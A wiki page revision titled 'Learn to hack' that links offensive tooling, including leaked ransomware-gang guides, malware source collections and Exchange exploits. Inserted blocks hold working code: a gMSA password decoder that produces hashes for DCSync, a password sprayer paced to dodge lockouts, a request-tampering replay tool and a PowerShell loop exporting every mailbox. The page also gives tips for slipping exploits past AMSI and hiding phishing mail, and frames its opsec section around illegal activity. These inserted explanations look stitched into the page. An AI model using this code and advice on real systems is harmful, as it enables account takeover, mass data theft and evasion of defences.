Learn to hack: Difference between revisions
Revision as of 13:40, 31 December 2022
This page aims to compile high quality resources for hackers. All books listed on this page can be found on Library Genesis and Z-Library
General Resources
Resources that assume little to no background knowledge:
Resources that assume minimal tech background:
- (book) Penetration Testing: A Hands-On Introduction to Hacking
- Bassterlord Networking Manual (translated): https://papers.vx-underground.org/papers/VXUG/Mirrors/BassterlordNetworkingManual.pdf
Resources that assume a tech or hacking background:
- (book) The Hacker Playbook 3
- books by Sparc Flow
- Hack Back! A DIY Guide
- https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak
Practice labs:
- https://www.hackthebox.com/
- https://www.pentesteracademy.com/
- https://lab.pentestit.ru/
- https://overthewire.org/wargames/
General references:
- https://www.ired.team
- http://pwnwiki.io
- https://dmcxblue.gitbook.io/red-team-notes-2-0
- https://github.com/swisskyrepo/PayloadsAllTheThings
- https://github.com/S3cur3Th1sSh1t/Pentest-Tools
- https://github.com/offensive-security/exploitdb
- https://github.com/payloadbox
- Collection of malware source code: https://github.com/vxunderground/MalwareSourceCode
- https://github.com/jhaddix/tbhm
- https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
- https://www.metasploit.com
- https://github.com/emilyanncr/Windows-Post-Exploitation
- https://github.com/infosecn1nja/Red-Teaming-Toolkit
- https://github.com/edoardottt/awesome-hacker-search-engines
- https://github.com/Hack-with-Github/Awesome-Hacking
- https://github.com/LOLBAS-Project/LOLBAS
- https://docs.anarchy-farm.com
- https://book.hacktricks.xyz
- https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
- https://github.com/0dayCTF/reverse-shell-generator
- https://0xsp.com/offensive/red-teaming-toolkit-collection/
- https://pwncat.org/
- https://gtfobins.github.io/
- https://codex-7.gitbook.io/
- https://github.com/qazbnm456/awesome-web-security
- https://githubmemory.com/repo/Qing-Q/awesome-hacking-lists
- https://github.com/A-poc/RedTeam-Tools
Active Directory
- An excellent practical reference
- A practical reference focused on powershell
- https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
- https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
- https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
- https://wadcoms.github.io/
- https://www.blackhillsinfosec.com/webcast-attack-tactics-5-zero-to-hero-attack/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
- https://en.hackndo.com/ntlm-relay/
- https://s3cur3th1ssh1t.github.io/The-most-common-on-premise-vulnerabilities-and-misconfigurations/
- A very thorough technical background: https://zer1t0.gitlab.io/posts/attacking_ad/
- kerberos background: https://www.tarlogic.com/blog/how-kerberos-works/
- A good overview of different lateral movement techniques: https://hackmag.com/security/lateral-guide/
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet
Tools
- https://mpgn.gitbook.io/crackmapexec/
- https://www.secureauth.com/labs/open-source-tools/impacket/
- https://github.com/dirkjanm/mitm6
- https://github.com/lgandx/Responder
- https://github.com/FuzzySecurity/StandIn
- https://www.joeware.net/freetools/tools/adfind/
- https://github.com/CravateRouge/bloodyAD
- https://github.com/blacklanternsecurity/MANSPIDER
- https://github.com/login-securite/DonPAPI
- Powerview/Sharpview
- Bloodhound/Sharphound
Office 365 & Azure
- Extremely in-depth technical info on everything https://o365blog.com/
- https://www.synacktiv.com/en/publications/azure-ad-introduction-for-red-teamers.html
- https://blog.xpnsec.com/azuread-connect-for-redteam/
- AAD Connect cloud sync: as local admin on the provisioning agent host, impersonate the provagentgMSA account or retrieve its managed password (msDS-ManagedPassword), then DCSync with it; the agent's gMSA holds the replication rights it needs for password hash sync.
- https://www.blackhillsinfosec.com/webcast-getting-started-in-pentesting-the-cloud-azure/
- https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md
- https://www.inversecos.com/
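The AAD Connect cloud sync item above stops at "retrieve the managed password ... to dcsync". What LDAP actually hands back is the msDS-ManagedPassword attribute, an MSDS-MANAGEDPASSWORD_BLOB, and DCSync tooling wants the NT hash, not the raw 256-byte password. The following is an added example, not code from this page or from any of the tools listed on it: it decodes the blob following the MS-ADTS 2.2.19 layout and derives the NT hash (MD4 over the UTF-16LE bytes) with a self-contained MD4 so it runs offline. The blob it parses is constructed inline from a known password; fetching the real attribute, which a DC only returns over a sealed LDAP connection to a principal allowed to retrieve it, is assumed and left out. build_blob, demo and the interval values are this example's own constructions.

```python
import struct

MASK = 0xFFFFFFFF


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); included because hashlib.new("md4") is often missing on OpenSSL 3 builds."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    rounds = (  # (function, word order, per-step shifts, additive constant)
        (f, tuple(range(16)), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, const in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + fn(b, c, d) + x[idx] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate register roles: next step updates what was d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash is MD4 over the UTF-16LE password bytes; a gMSA password is already raw UTF-16LE."""
    return md4(password_utf16le).hex()


def parse_managed_password_blob(blob: bytes) -> dict:
    """Decode an msDS-ManagedPassword value (MSDS-MANAGEDPASSWORD_BLOB, MS-ADTS 2.2.19)."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a managed-password blob: version %d, length %d of %d" % (version, length, len(blob)))

    def utf16_field(start: int, end: int) -> bytes:
        field = blob[start:end]
        while field.endswith(b"\x00\x00"):   # drop the null terminator and alignment padding, whole code units only
            field = field[:-2]
        return field

    current = utf16_field(cur_off, prev_off or qpi_off)
    previous = utf16_field(prev_off, qpi_off) if prev_off else b""
    return {
        "current_password": current,
        "current_nt_hash": nt_hash(current),
        "previous_password": previous,
        # both intervals are 100 ns units: time until the password must be re-queried,
        # and time the current password stays unchanged
        "query_password_interval": struct.unpack_from("<Q", blob, qpi_off)[0],
        "unchanged_password_interval": struct.unpack_from("<Q", blob, upi_off)[0],
    }


def build_blob(current: bytes, previous: bytes = b"") -> bytes:
    """Assemble a blob in the DC's layout; used here only to construct test input, not a real secret."""
    body = current + b"\x00\x00"
    prev_off = 0
    if previous:
        prev_off = 16 + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * ((8 - (16 + len(body)) % 8) % 8)   # align the two QWORD intervals
    qpi_off = 16 + len(body)
    upi_off = qpi_off + 8
    header = struct.pack("<HHIHHHH", 1, 0, upi_off + 8, 16, prev_off, qpi_off, upi_off)
    day = 24 * 3600 * 10_000_000   # constructed interval values, in 100 ns ticks
    return header + body + struct.pack("<QQ", day, 30 * day)


def demo() -> dict:
    # Constructed input: a gMSA whose current password is "password" (real ones are 128 random code units).
    return parse_managed_password_blob(build_blob("password".encode("utf-16-le")))
```

The current_nt_hash value is what goes into the -hashes argument of DCSync tooling such as impacket's secretsdump; the raw current_password is only useful for tools that take the UTF-16LE bytes directly.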
Tools
- https://github.com/nyxgeek/o365recon
- https://github.com/dirkjanm/ROADtools
- https://github.com/fox-it/adconnectdump
- https://github.com/LMGsec/o365creeper
- https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
- https://github.com/rvrsh3ll/TokenTactics
- https://github.com/nyxgeek/onedrive_user_enum
- https://github.com/dafthack/MSOLSpray
- https://github.com/dafthack/MFASweep
GSuite
- https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite
C2 Frameworks
Antivirus & EDR Evasion
- https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/
- https://s3cur3th1ssh1t.github.io/Customizing_C2_Frameworks/
- https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/
- https://www.blackhillsinfosec.com/tag/sacred-cash-cow-tipping/
- https://blog.securityevaluators.com/creating-av-resistant-malware-part-1-7604b83ea0c0
- https://www.ired.team/offensive-security/defense-evasion
- https://www.youtube.com/watch?v=UO3PjJIiBIE
- https://github.com/matterpreter/DefenderCheck
- https://github.com/RythmStick/AMSITrigger
- https://amsi.fail
VMware
- Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md
- VMware Workspace ONE Access and Identity Manager RCE via SSTI (CVE-2022-22954, unauthenticated server-side template injection): Mass Exploit
RocketChat
- Account hijacking and RCE as admin: https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy
Microsoft Exchange
ProxyLogon is dead: Defender mitigates it. ProxyShell is not mitigated, but AMSI catches the unmodified public exploits, so expect to modify them before use.
- ProxyShell: https://github.com/dmaasland/proxyshell-poc
- Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell
- ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md
- ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94
- Polymorphic webshells: https://github.com/grCod/poly
- ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF
- Export all mailboxes. The account needs the "Mailbox Import Export" management role, which nobody holds by default; Get-Mailbox returns only 1000 objects unless -ResultSize Unlimited is given; the FilePath must be a UNC path the Exchange server can write to. Check progress with Get-MailboxExportRequest | Get-MailboxExportRequestStatistics.
```powershell
foreach ($mbx in (Get-Mailbox -ResultSize Unlimited)) {
    New-MailboxExportRequest -Mailbox $mbx.Alias -FilePath "\\127.0.0.1\C$\Folder\$($mbx.Alias).pst"
}
```
- Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain
- Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto
Initial Access
Phishing
- https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
- https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
- https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
- https://www.xanthus.io/mastering-the-simulated-phishing-attack
- https://github.com/Arno0x/EmbedInHTML
- https://github.com/L4bF0x/PhishingPretexts
- http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
- https://book.hacktricks.xyz/phishing-methodology
- https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
- https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
- https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
- https://getgophish.com/ (be sure to strip the identifying headers Gophish adds to every mail, X-Mailer: gophish and the X-Gophish-* headers, and note that its default rid= tracking parameter is just as recognisable)
- https://github.com/curtbraz/PhishAPI
- https://github.com/edoverflow/can-i-take-over-xyz
- https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
Password spraying
- https://github.com/dafthack/MSOLSpray
- https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying/
- https://github.com/blacklanternsecurity/TREVORspray
- https://github.com/x90skysn3k/brutespray
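All of the tools above implement the same idea: one password against every account per lockout observation window, so that no single account ever accumulates enough bad-password attempts to lock. The following is an added example, not code from this page or from any of the listed tools, showing that scheduling with a lockout budget. The authenticator is a constructed stand-in for whatever the real target is (an OAuth endpoint, OWA, SMB); the threshold and window are assumed to have been read from the domain policy beforehand (net accounts /domain or Get-ADDefaultDomainPasswordPolicy). LockoutPolicy, spray, peak_failures and demo are this example's own names; cloud identity providers keep their own lockout counters, so the on-prem policy is a floor, not a guarantee.

```python
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class LockoutPolicy:
    threshold: int          # lockoutThreshold: bad passwords that lock an account; 0 means never
    window_s: float         # lockoutObservationWindow: seconds after which the bad-password count resets
    safety_margin: int = 1  # attempts held back so a user's own typo in the same window does not lock them


def spray(
    authenticate: Callable[[str, str], bool],
    users: List[str],
    passwords: List[str],
    policy: LockoutPolicy,
    sleep: Callable[[float], None] = time.sleep,
    now: Callable[[], float] = time.monotonic,
) -> Tuple[Dict[str, str], List[dict]]:
    """Spray: every user gets one password before any user gets a second.
    Before each attempt, failures older than the observation window are forgotten; if a user
    still has threshold - margin recent failures, sleep until the oldest one ages out.
    Returns ({user: password} for successes, attempt log)."""
    budget = None
    if policy.threshold:
        budget = policy.threshold - policy.safety_margin
        if budget < 1:
            raise ValueError("lockout threshold leaves no attempts once the safety margin is applied")
    failures: Dict[str, List[float]] = {u: [] for u in users}
    found: Dict[str, str] = {}
    log: List[dict] = []
    for password in passwords:
        for user in users:
            if user in found:
                continue   # a hit is never sprayed again
            if budget is not None:
                t = now()
                failures[user] = [ts for ts in failures[user] if t - ts < policy.window_s]
                if len(failures[user]) >= budget:
                    sleep(max(policy.window_s - (t - failures[user][0]), 0.0))
                    failures[user].pop(0)   # the oldest failure has now aged out of the window
            ok = authenticate(user, password)
            log.append({"user": user, "password": password, "ok": ok, "t": now()})
            if ok:
                found[user] = password
            else:
                failures[user].append(now())
    return found, log


def peak_failures(log: List[dict], window_s: float) -> int:
    """Highest number of failed attempts any single user received inside one observation window."""
    peak = 0
    for user in {e["user"] for e in log}:
        times = [e["t"] for e in log if e["user"] == user and not e["ok"]]
        for i, t0 in enumerate(times):
            peak = max(peak, sum(1 for t in times[i:] if t - t0 < window_s))
    return peak


def demo() -> Tuple[Dict[str, str], List[float], List[dict]]:
    """Offline run against a constructed directory with a fake clock; returns (hits, sleeps taken, log)."""
    valid = {"bob": "Spring2023!"}   # constructed: the only working credential
    clock = [0.0]
    sleeps: List[float] = []

    def fake_sleep(s: float) -> None:
        sleeps.append(s)
        clock[0] += s

    found, log = spray(
        authenticate=lambda u, p: valid.get(u) == p,
        users=["alice", "bob", "carol"],
        passwords=["Winter2022!", "Spring2023!", "Summer2023!"],
        policy=LockoutPolicy(threshold=3, window_s=1800),
        sleep=fake_sleep,
        now=lambda: clock[0],
    )
    return found, sleeps, log
```

With a threshold of 3 and a margin of 1, the third password forces a full observation-window pause for every account that has not yet produced a hit, which is exactly the pacing the listed sprayers expose as delay or jitter options.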
Buying Access
CVE POCs
Scanning and Recon
- https://github.com/robertdavidgraham/masscan
- https://github.com/projectdiscovery/naabu
- https://github.com/OWASP/Amass
- https://www.shodan.io/
- https://www.zoomeye.org/
- https://search.censys.io/
- https://hunter.io/
- https://fullhunt.io/
- https://www.onyphe.io/
- https://binaryedge.io/
- https://ivre.rocks/
- https://vulners.com/
- https://pulsedive.com/
- https://www.exploit-db.com
- https://github.com/six2dez/reconftw
- https://github.com/lanmaster53/recon-ng
- https://github.com/jaeles-project/jaeles
- https://github.com/1N3/Sn1per
- https://github.com/projectdiscovery/nuclei
- https://github.com/wpscanteam/wpscan
- https://github.com/OWASP/joomscan
- https://github.com/immunIT/drupwn
- https://github.com/Tuhinshubhra/RED_HAWK
- https://github.com/root-tanishq/userefuzz
Web Crawlers
Wordlists
- https://wordlists.assetnote.io/
- https://github.com/danielmiessler/SecLists
- https://github.com/ameenmaali/wordlistgen
OSINT
Open-source intelligence Tools/Resources
- https://osintframework.com/
- https://www.tracelabs.org/initiatives/osint-vm
- https://github.com/jivoi/awesome-osint
- osintframework.de
- https://www.maltego.com/
- https://github.com/vysecurity/LinkedInt
- https://www.osintdojo.com/
- https://inteltechniques.com/
- https://github.com/uosint-project/uosint
- https://github.com/cipher387/osint_stuff_tool_collection
API Hacking
Intercepting Proxies
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications.
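At the wire level, every intercepting proxy does the same three things per request: parse what the browser sent, let you change it, and put it back on the wire with consistent framing. The following is an added example, not code from this page or from Burp, ZAP or mitmproxy: it parses a raw HTTP/1.1 request, edits a header, the query string or a form field, re-serializes with Content-Length recomputed (the part hand-edited requests usually get wrong), and replays it with http.client. The captured request, the app.example host, and the names Request, parse_request, intercept, replay and demo are this example's constructions; replay assumes a reachable target and is not exercised offline.

```python
import http.client
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

CRLF = b"\r\n"


@dataclass
class Request:
    method: str
    target: str                      # request-target exactly as sent, e.g. /login?next=%2Fdashboard
    version: str
    headers: List[Tuple[str, str]]   # ordered pairs, duplicates kept, as on the wire
    body: bytes

    def header(self, name: str) -> Optional[str]:
        return next((v for k, v in self.headers if k.lower() == name.lower()), None)

    def set_header(self, name: str, value: str) -> None:
        self.headers = [(k, v) for k, v in self.headers if k.lower() != name.lower()] + [(name, value)]

    def query(self) -> Dict[str, str]:
        return dict(parse_qsl(urlsplit(self.target).query, keep_blank_values=True))

    def set_query(self, params: Dict[str, str]) -> None:
        self.target = urlunsplit(urlsplit(self.target)._replace(query=urlencode(params)))

    def form(self) -> Dict[str, str]:
        return dict(parse_qsl(self.body.decode("latin-1"), keep_blank_values=True))

    def set_form(self, fields: Dict[str, str]) -> None:
        self.body = urlencode(fields).encode("latin-1")
        self.set_header("Content-Type", "application/x-www-form-urlencoded")
        self.set_header("Content-Length", str(len(self.body)))   # the step hand-edited requests usually miss

    def serialize(self) -> bytes:
        """Back to wire format; Content-Length always reflects the body actually being sent."""
        headers = [(k, v) for k, v in self.headers if k.lower() != "content-length"]
        if self.body or self.method in ("POST", "PUT", "PATCH"):
            headers.append(("Content-Length", str(len(self.body))))
        lines = [f"{self.method} {self.target} {self.version}"] + [f"{k}: {v}" for k, v in headers]
        return CRLF.join(line.encode("latin-1") for line in lines) + CRLF + CRLF + self.body


def parse_request(raw: bytes) -> Request:
    """Parse one HTTP/1.1 request as read from the client socket (Content-Length framing only, no chunking)."""
    head, _, rest = raw.partition(CRLF + CRLF)
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    req = Request(method, target, version, headers, b"")
    req.body = rest[: int(req.header("Content-Length") or 0)]
    return req


def intercept(req: Request) -> Request:
    """The edit hook a proxy runs before forwarding. This one tags the request and, on a form post,
    rewrites a client-controlled 'role' field: the classic parameter-tamper test for mass assignment."""
    req.set_header("X-Intercepted", "1")
    if req.method == "POST" and "application/x-www-form-urlencoded" in (req.header("Content-Type") or ""):
        fields = req.form()
        if "role" in fields:
            fields["role"] = "admin"
        req.set_form(fields)
    return req


def replay(req: Request, host: str, port: int = 80) -> Tuple[int, bytes]:
    """Re-send an edited request to the target (assumed reachable; not exercised offline)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request(req.method, req.target, body=req.body, headers=dict(req.headers))
    resp = conn.getresponse()
    return resp.status, resp.read()


# Constructed capture: a login form post as the proxy would read it from the browser socket.
CAPTURED = (
    b"POST /login?next=%2Fdashboard HTTP/1.1\r\n"
    b"Host: app.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 39\r\n"
    b"\r\n"
    b"user=alice&pass=Winter2022%21&role=user"
)


def demo() -> Request:
    return intercept(parse_request(CAPTURED))
```

Replaying is then replay(demo(), "app.example"); comparing the response with the unmodified request's response is how you tell whether the server trusted the tampered field.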
Opsec
Any illegal activity should be done from a separate, full-disk-encrypted computer or virtual machine, with all traffic routed over Tor.
- https://www.qubes-os.org/
- https://www.whonix.org/
- https://tails.boum.org/
- The whonix wiki has lots of great info on anonymity even if you're not using whonix: https://www.whonix.org/wiki/Documentation
- https://gitlab.torproject.org/legacy/trac/-/wikis/doc/TransparentProxy
- https://veracrypt.fr/
- https://www.torproject.org/
- Disable javascript (set Security Level to "Safest" in Tor Browser)
Secure Messaging
Best practice is for your connections to go over Tor and for your messages to be end-to-end encrypted. For Jabber/XMPP make sure to enable OTR or OMEMO encryption. For email use PGP. For file sharing use OnionShare.
- Tails comes with OnionShare for file sharing, Pidgin with OTR for encrypted chat, and Thunderbird with GPG for encrypted email
- Probably the most mature jabber client with a focus on security and privacy is CoyIM
- https://cwtch.im/
- https://www.thunderbird.net/ An email client with built-in support for PGP encryption
- https://onionshare.org/
- See the whonix wiki for a more detailed comparison of secure messaging software